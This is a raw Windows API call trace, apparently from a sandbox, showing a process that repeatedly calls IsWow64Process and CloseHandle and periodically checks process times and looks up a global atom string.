	[0131.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.075] CloseHandle (hObject=0x2dc) returned 1
	[0131.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.075] CloseHandle (hObject=0x2dc) returned 1
	[0131.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.075] CloseHandle (hObject=0x2dc) returned 1
	[0131.075] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.075] CloseHandle (hObject=0x2dc) returned 1
	[0131.112] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.113] CloseHandle (hObject=0x2dc) returned 1
	[0131.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.113] CloseHandle (hObject=0x2dc) returned 1
	[0131.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.113] CloseHandle (hObject=0x2dc) returned 1
	[0131.113] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.113] CloseHandle (hObject=0x2dc) returned 1
	[0131.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.114] CloseHandle (hObject=0x2dc) returned 1
	[0131.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.114] CloseHandle (hObject=0x2dc) returned 1
	[0131.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.114] CloseHandle (hObject=0x2dc) returned 1
	[0131.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.114] CloseHandle (hObject=0x2dc) returned 1
	[0131.114] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.115] CloseHandle (hObject=0x2dc) returned 1
	[0131.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.115] CloseHandle (hObject=0x2dc) returned 1
	[0131.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.115] CloseHandle (hObject=0x2dc) returned 1
	[0131.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.115] CloseHandle (hObject=0x2dc) returned 1
	[0131.115] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.115] CloseHandle (hObject=0x2dc) returned 1
	[0131.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.116] CloseHandle (hObject=0x2dc) returned 1
	[0131.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.116] CloseHandle (hObject=0x2dc) returned 1
	[0131.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.116] CloseHandle (hObject=0x2dc) returned 1
	[0131.116] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.116] CloseHandle (hObject=0x2dc) returned 1
	[0131.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.117] CloseHandle (hObject=0x2dc) returned 1
	[0131.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.117] CloseHandle (hObject=0x2dc) returned 1
	[0131.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.117] CloseHandle (hObject=0x2dc) returned 1
	[0131.117] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.117] CloseHandle (hObject=0x2dc) returned 1
	[0131.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.118] CloseHandle (hObject=0x2dc) returned 1
	[0131.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.118] CloseHandle (hObject=0x2dc) returned 1
	[0131.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.118] CloseHandle (hObject=0x2dc) returned 1
	[0131.118] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.118] CloseHandle (hObject=0x2dc) returned 1
	[0131.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.119] CloseHandle (hObject=0x2dc) returned 1
	[0131.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.119] CloseHandle (hObject=0x2dc) returned 1
	[0131.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.119] CloseHandle (hObject=0x2dc) returned 1
	[0131.119] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.119] CloseHandle (hObject=0x2dc) returned 1
	[0131.120] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.120] CloseHandle (hObject=0x2dc) returned 1
	[0131.120] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.120] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.120] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.121] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.121] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.121] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.121] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.121] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.122] CloseHandle (hObject=0x2dc) returned 1
	[0131.122] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.122] CloseHandle (hObject=0x2dc) returned 1
	[0131.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.122] CloseHandle (hObject=0x2dc) returned 1
	[0131.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.122] CloseHandle (hObject=0x2dc) returned 1
	[0131.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.123] CloseHandle (hObject=0x2dc) returned 1
	[0131.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.123] CloseHandle (hObject=0x2dc) returned 1
	[0131.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.156] CloseHandle (hObject=0x2dc) returned 1
	[0131.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.156] CloseHandle (hObject=0x2dc) returned 1
	[0131.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.156] CloseHandle (hObject=0x2dc) returned 1
	[0131.156] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.156] CloseHandle (hObject=0x2dc) returned 1
	[0131.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.157] CloseHandle (hObject=0x2dc) returned 1
	[0131.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.157] CloseHandle (hObject=0x2dc) returned 1
	[0131.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.157] CloseHandle (hObject=0x2dc) returned 1
	[0131.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.157] CloseHandle (hObject=0x2dc) returned 1
	[0131.157] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.157] CloseHandle (hObject=0x2dc) returned 1
	[0131.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.158] CloseHandle (hObject=0x2dc) returned 1
	[0131.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.158] CloseHandle (hObject=0x2dc) returned 1
	[0131.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.158] CloseHandle (hObject=0x2dc) returned 1
	[0131.158] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.158] CloseHandle (hObject=0x2dc) returned 1
	[0131.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.159] CloseHandle (hObject=0x2dc) returned 1
	[0131.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.159] CloseHandle (hObject=0x2dc) returned 1
	[0131.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.159] CloseHandle (hObject=0x2dc) returned 1
	[0131.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.159] CloseHandle (hObject=0x2dc) returned 1
	[0131.159] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.159] CloseHandle (hObject=0x2dc) returned 1
	[0131.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.160] CloseHandle (hObject=0x2dc) returned 1
	[0131.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.160] CloseHandle (hObject=0x2dc) returned 1
	[0131.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.160] CloseHandle (hObject=0x2dc) returned 1
	[0131.160] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.160] CloseHandle (hObject=0x2dc) returned 1
	[0131.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.161] CloseHandle (hObject=0x2dc) returned 1
	[0131.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.161] CloseHandle (hObject=0x2dc) returned 1
	[0131.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.161] CloseHandle (hObject=0x2dc) returned 1
	[0131.161] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.161] CloseHandle (hObject=0x2dc) returned 1
	[0131.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.162] CloseHandle (hObject=0x2dc) returned 1
	[0131.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.162] CloseHandle (hObject=0x2dc) returned 1
	[0131.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.162] CloseHandle (hObject=0x2dc) returned 1
	[0131.162] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.162] CloseHandle (hObject=0x2dc) returned 1
	[0131.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.163] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.163] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.164] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.164] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.164] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.164] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.164] CloseHandle (hObject=0x2dc) returned 1
	[0131.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.165] CloseHandle (hObject=0x2dc) returned 1
	[0131.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.165] CloseHandle (hObject=0x2dc) returned 1
	[0131.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.165] CloseHandle (hObject=0x2dc) returned 1
	[0131.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.165] CloseHandle (hObject=0x2dc) returned 1
	[0131.165] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.166] CloseHandle (hObject=0x2dc) returned 1
	[0131.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.199] CloseHandle (hObject=0x2dc) returned 1
	[0131.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.199] CloseHandle (hObject=0x2dc) returned 1
	[0131.199] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.199] CloseHandle (hObject=0x2dc) returned 1
	[0131.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.200] CloseHandle (hObject=0x2dc) returned 1
	[0131.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.200] CloseHandle (hObject=0x2dc) returned 1
	[0131.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.200] CloseHandle (hObject=0x2dc) returned 1
	[0131.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.200] CloseHandle (hObject=0x2dc) returned 1
	[0131.200] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.201] CloseHandle (hObject=0x2dc) returned 1
	[0131.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.201] CloseHandle (hObject=0x2dc) returned 1
	[0131.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.201] CloseHandle (hObject=0x2dc) returned 1
	[0131.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.201] CloseHandle (hObject=0x2dc) returned 1
	[0131.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.202] CloseHandle (hObject=0x2dc) returned 1
	[0131.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.202] CloseHandle (hObject=0x2dc) returned 1
	[0131.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.202] CloseHandle (hObject=0x2dc) returned 1
	[0131.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.202] CloseHandle (hObject=0x2dc) returned 1
	[0131.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.203] CloseHandle (hObject=0x2dc) returned 1
	[0131.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.203] CloseHandle (hObject=0x2dc) returned 1
	[0131.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.203] CloseHandle (hObject=0x2dc) returned 1
	[0131.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.203] CloseHandle (hObject=0x2dc) returned 1
	[0131.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.204] CloseHandle (hObject=0x2dc) returned 1
	[0131.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.204] CloseHandle (hObject=0x2dc) returned 1
	[0131.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.204] CloseHandle (hObject=0x2dc) returned 1
	[0131.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.204] CloseHandle (hObject=0x2dc) returned 1
	[0131.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.204] CloseHandle (hObject=0x2dc) returned 1
	[0131.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.205] CloseHandle (hObject=0x2dc) returned 1
	[0131.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.205] CloseHandle (hObject=0x2dc) returned 1
	[0131.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.205] CloseHandle (hObject=0x2dc) returned 1
	[0131.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.205] CloseHandle (hObject=0x2dc) returned 1
	[0131.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.206] CloseHandle (hObject=0x2dc) returned 1
	[0131.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.206] CloseHandle (hObject=0x2dc) returned 1
	[0131.206] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.206] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.206] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.207] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.207] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.207] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.207] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.207] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.208] CloseHandle (hObject=0x2dc) returned 1
	[0131.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.208] CloseHandle (hObject=0x2dc) returned 1
	[0131.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.208] CloseHandle (hObject=0x2dc) returned 1
	[0131.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.208] CloseHandle (hObject=0x2dc) returned 1
	[0131.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.209] CloseHandle (hObject=0x2dc) returned 1
	[0131.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.209] CloseHandle (hObject=0x2dc) returned 1
	[0131.241] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.241] CloseHandle (hObject=0x2dc) returned 1
	[0131.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.242] CloseHandle (hObject=0x2dc) returned 1
	[0131.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.242] CloseHandle (hObject=0x2dc) returned 1
	[0131.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.242] CloseHandle (hObject=0x2dc) returned 1
	[0131.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.242] CloseHandle (hObject=0x2dc) returned 1
	[0131.242] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.243] CloseHandle (hObject=0x2dc) returned 1
	[0131.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.243] CloseHandle (hObject=0x2dc) returned 1
	[0131.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.243] CloseHandle (hObject=0x2dc) returned 1
	[0131.243] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.243] CloseHandle (hObject=0x2dc) returned 1
	[0131.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.244] CloseHandle (hObject=0x2dc) returned 1
	[0131.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.244] CloseHandle (hObject=0x2dc) returned 1
	[0131.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.244] CloseHandle (hObject=0x2dc) returned 1
	[0131.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.244] CloseHandle (hObject=0x2dc) returned 1
	[0131.244] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.244] CloseHandle (hObject=0x2dc) returned 1
	[0131.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.245] CloseHandle (hObject=0x2dc) returned 1
	[0131.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.245] CloseHandle (hObject=0x2dc) returned 1
	[0131.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.245] CloseHandle (hObject=0x2dc) returned 1
	[0131.245] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.245] CloseHandle (hObject=0x2dc) returned 1
	[0131.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.246] CloseHandle (hObject=0x2dc) returned 1
	[0131.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.246] CloseHandle (hObject=0x2dc) returned 1
	[0131.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.246] CloseHandle (hObject=0x2dc) returned 1
	[0131.246] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.246] CloseHandle (hObject=0x2dc) returned 1
	[0131.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.247] CloseHandle (hObject=0x2dc) returned 1
	[0131.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.247] CloseHandle (hObject=0x2dc) returned 1
	[0131.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.247] CloseHandle (hObject=0x2dc) returned 1
	[0131.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.247] CloseHandle (hObject=0x2dc) returned 1
	[0131.247] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.247] CloseHandle (hObject=0x2dc) returned 1
	[0131.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.248] CloseHandle (hObject=0x2dc) returned 1
	[0131.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.248] CloseHandle (hObject=0x2dc) returned 1
	[0131.248] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.248] CloseHandle (hObject=0x2dc) returned 1
	[0131.249] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.249] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.249] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
